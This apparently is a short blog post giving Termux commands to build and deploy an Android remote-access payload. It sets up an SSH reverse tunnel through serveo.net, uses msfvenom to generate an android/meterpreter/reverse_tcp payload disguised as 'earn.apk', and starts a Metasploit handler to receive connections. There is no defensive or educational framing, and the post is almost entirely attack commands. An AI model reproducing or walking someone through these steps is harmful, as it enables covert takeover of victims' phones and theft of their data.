PAYLOAD GENERATOR for termux

PAYLOAD GENERATOR


$ pkg install openssh
$ ssh -R 0:localhost:1492 serveo.net

NEW PAGE

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=(port) -o /sdcard/earn.apk

NEW PAGE

$ msfconsole
$ set PAYLOAD android/meterpreter/reverse_tcp
$ set LHOST (localhost)
$ set LPORT (port)
$ exploit

No comments:

Post a Comment

What is Double-testing with lookahead assertions in Regex.mp4

  Download Video :  What is Double-testing with lookahead assertions in Regex.mp4 Double-Testing with Lookahead Assertions (Regex) Double-te...